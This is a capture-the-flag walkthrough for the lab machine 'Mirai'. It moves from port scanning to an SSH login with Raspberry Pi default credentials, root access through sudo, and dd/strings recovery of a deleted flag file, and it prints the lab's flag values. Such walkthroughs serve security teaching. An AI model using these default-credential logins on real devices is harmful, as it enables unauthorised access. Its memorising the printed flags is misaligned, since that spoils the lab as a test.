Mirai
- OS: Linux
- Difficulty: Easy
- IP Address: 10.10.10.48
- Release: 02 / 09 / 2017
Port scanning
# Nmap 7.92 scan initiated as: nmap -sC -sV -o nmap/targeted 10.10.10.48 -p 22,53,80,1700,32400,32469
Nmap scan report for 10.10.10.48
Host is up (0.067s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35
1700/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open http Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
|_http-favicon: Plex
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-title: Unauthorized
32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 21.09 seconds
This machine has ports 22 (SSH), 53 (DNS, dnsmasq), 80 (HTTP, lighttpd), 1700 and 32469 (UPnP) and 32400 (Plex Media Server) open.
System enumeration
If we connect to port 80 using curl, we will see some unusual HTTP response headers:
$ curl -i 10.10.10.48
HTTP/1.1 404 Not Found
X-Pi-hole: A black hole for Internet advertisements.
Content-type: text/html; charset=UTF-8
Content-Length: 0
Date: Fri, 15 Jul 2022 11:47:54 GMT
Server: lighttpd/1.4.35
Pi-hole is a service that blocks given IP addresses and domains at the DNS level, and it is meant to be run on a Raspberry Pi.
The name of the machine (Mirai) refers to the Mirai botnet, a cyber attack in which a botnet of compromised IoT devices (IP cameras and other devices exposing open ports with default credentials) was used to launch DDoS attacks against DNS servers.
Foothold on the machine
Given that the machine is likely to be a Raspberry Pi device, we can try to connect via SSH with the default credentials (username: pi, password: raspberry):
$ ssh pi@10.10.10.48
pi@raspberrypi:~ $ find / -name user.txt 2>/dev/null
/home/pi/Desktop/user.txt
/lib/live/mount/persistence/sda2/home/pi/Desktop/user.txt
pi@raspberrypi:~ $ cat /home/pi/Desktop/user.txt
ff837707441b257a20e32199d7c8838d
And we are in.
Privilege escalation
Let’s do a basic enumeration:
pi@raspberrypi:~ $ id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),117(i2c),998(gpio),999(spi)
We belong to the sudo group, so we can spawn a shell as root:
pi@raspberrypi:~ $ sudo su
root@raspberrypi:/home/pi# cd
root@raspberrypi:~# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
But where's the root.txt flag? Let's go to the USB stick:
root@raspberrypi:~# ls -la /
total 72
drwxr-xr-x 35 root root 4096 Aug 14 2017 .
drwxr-xr-x 35 root root 4096 Aug 14 2017 ..
drwxr-xr-x 2 root root 4096 Aug 13 2017 bin
drwxr-xr-x 2 root root 4096 Aug 13 2017 boot
drwxr-xr-x 17 root root 3280 Jul 15 11:42 dev
drwxr-xr-x 170 root root 4096 Dec 24 2017 etc
drwxr-xr-x 4 root root 4096 Aug 13 2017 home
lrwxrwxrwx 1 root root 33 Dec 13 2016 initrd.img -> /boot/initrd.img-3.16.0-4-686-pae
lrwxrwxrwx 1 root root 29 Dec 13 2016 initrd.img.old -> /boot/initrd.img-3.16.0-4-586
drwxr-xr-x 28 root root 4096 Aug 13 2017 lib
drwx------ 2 root root 16384 Aug 13 2017 lost+found
drwxr-xr-x 3 root root 4096 Aug 14 2017 media
drwxr-xr-x 2 root root 3 Nov 2 2016 mnt
drwxr-xr-x 6 root root 4096 Aug 13 2017 opt
-rw-r--r-- 1 root root 8 Aug 13 2017 persistence.conf
dr-xr-xr-x 127 root root 0 Jul 15 11:41 proc
drwx------ 3 root root 4096 Aug 27 2017 root
drwxr-xr-x 24 root root 820 Jul 15 11:56 run
drwxr-xr-x 2 root root 4096 Dec 24 2017 sbin
drwxr-xr-x 2 root root 3 Nov 2 2016 srv
dr-xr-xr-x 13 root root 0 Jul 15 11:41 sys
drwxrwxrwt 13 root root 320 Jul 15 11:43 tmp
drwxr-xr-x 19 root root 4096 Aug 13 2017 usr
drwxr-xr-x 17 root root 4096 Aug 13 2017 var
lrwxrwxrwx 1 root root 29 Dec 13 2016 vmlinuz -> boot/vmlinuz-3.16.0-4-686-pae
lrwxrwxrwx 1 root root 25 Dec 13 2016 vmlinuz.old -> boot/vmlinuz-3.16.0-4-586
root@raspberrypi:~# ls -la /media
total 9
drwxr-xr-x 3 root root 4096 Aug 14 2017 .
drwxr-xr-x 35 root root 4096 Aug 14 2017 ..
drwxr-xr-x 3 root root 1024 Aug 14 2017 usbstick
root@raspberrypi:~# ls -la /media/usbstick/
total 18
drwxr-xr-x 3 root root 1024 Aug 14 2017 .
drwxr-xr-x 3 root root 4096 Aug 14 2017 ..
-rw-r--r-- 1 root root 129 Aug 14 2017 damnit.txt
drwx------ 2 root root 12288 Aug 14 2017 lost+found
root@raspberrypi:~# cat /media/usbstick/damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
The file has been deleted, so let's see whether we can recover it. These are all the volumes mounted on the system:
root@raspberrypi:~# df
Filesystem 1K-blocks Used Available Use% Mounted on
aufs 8856504 2832136 5551436 34% /
tmpfs 102396 4868 97528 5% /run
/dev/sda1 1354528 1354528 0 100% /lib/live/mount/persistence/sda1
/dev/loop0 1267456 1267456 0 100% /lib/live/mount/rootfs/filesystem.squashfs
tmpfs 255988 0 255988 0% /lib/live/mount/overlay
/dev/sda2 8856504 2832136 5551436 34% /lib/live/mount/persistence/sda2
devtmpfs 10240 0 10240 0% /dev
tmpfs 255988 8 255980 1% /dev/shm
tmpfs 5120 4 5116 1% /run/lock
tmpfs 255988 0 255988 0% /sys/fs/cgroup
tmpfs 255988 8 255980 1% /tmp
/dev/sdb 8887 93 8078 2% /media/usbstick
tmpfs 51200 0 51200 0% /run/user/999
tmpfs 51200 0 51200 0% /run/user/1000
Let's make a raw copy of the /dev/sdb device (the USB stick) using dd, following standard forensics methodology (work on an image, never on the live device, so nothing on it gets overwritten):
root@raspberrypi:~# dd if=/dev/sdb of=/tmp/sdb.dd
20480+0 records in
20480+0 records out
10485760 bytes (10 MB) copied, 0.0873187 s, 120 MB/s
Now we can read all printable contents of the image using strings. This also reveals deleted files, because deleting a file only unlinks its directory entry and marks its inode and data blocks as free; the bytes themselves stay on disk until they are reused:
root@raspberrypi:~# strings /tmp/sdb.dd
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
And there we have the root.txt flag.
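To show why the dd-then-strings recovery above works, here is an added example (not part of the original writeup) that builds a small constructed disk image in which a file has been "deleted" but its directory entry and data block are still present, then reimplements the printable-run extraction that strings performs and filters the result for 32-character hex flags. The block layout, the filler bytes and the flag value are all constructed for the demo.

```python
import re

# Constructed miniature "disk image": 4096-byte blocks, mimicking a raw dd copy of
# a small ext2 USB stick after a file was deleted. The directory block still names
# root.txt and its data block still holds the contents; only the inode and block
# bitmaps (not modelled here) were updated by the unlink.
BLOCK = 4096
FLAG = "0123456789abcdef0123456789abcdef"   # constructed sample value, not the real flag


def build_image() -> bytes:
    """Assemble a 4-block image with non-printable padding around the useful bytes."""
    directory = (b"\x0b\x00\x00\x00\x0c\x00\x01\x02.\x00\x00\x00"
                 b"lost+found\x00\x00root.txt\x00\x00damnit.txt\x00")
    deleted_data = (FLAG + "\n").encode()          # data block of the unlinked file
    note = (b"Damnit! Sorry man I accidentally deleted your files off the USB stick.\n"
            b"Do you know if there is any way to get them back?\n-James\n")
    filler = bytes([0x8f, 0x00, 0x01, 0xfe]) * (BLOCK // 4)   # binary noise, no text
    blocks = [filler, directory, deleted_data, note]
    return b"".join(b.ljust(BLOCK, b"\x00") for b in blocks)


def strings(data: bytes, min_len: int = 4) -> list[str]:
    """Return every run of at least min_len printable ASCII bytes (tab included),
    roughly what GNU strings prints by default."""
    pattern = rb"[\t\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


HEX32 = re.compile(r"^[0-9a-f]{32}$")


def find_flag_candidates(data: bytes) -> list[str]:
    """Narrow the extracted strings down to HTB-style 32-character hex values."""
    return [s for s in strings(data) if HEX32.match(s)]


def scan_image_file(path: str) -> list[str]:
    """Same filter applied to a real dd output file, e.g. /tmp/sdb.dd."""
    with open(path, "rb") as fh:
        return find_flag_candidates(fh.read())


if __name__ == "__main__":
    image = build_image()               # stands in for: dd if=/dev/sdb of=/tmp/sdb.dd
    for s in strings(image):            # equivalent of: strings /tmp/sdb.dd
        print(s)
    print("flag candidates:", find_flag_candidates(image))
```

Note that this only works while the freed blocks have not been reused; the same technique will recover nothing from a stick that was securely wiped or heavily rewritten after the deletion.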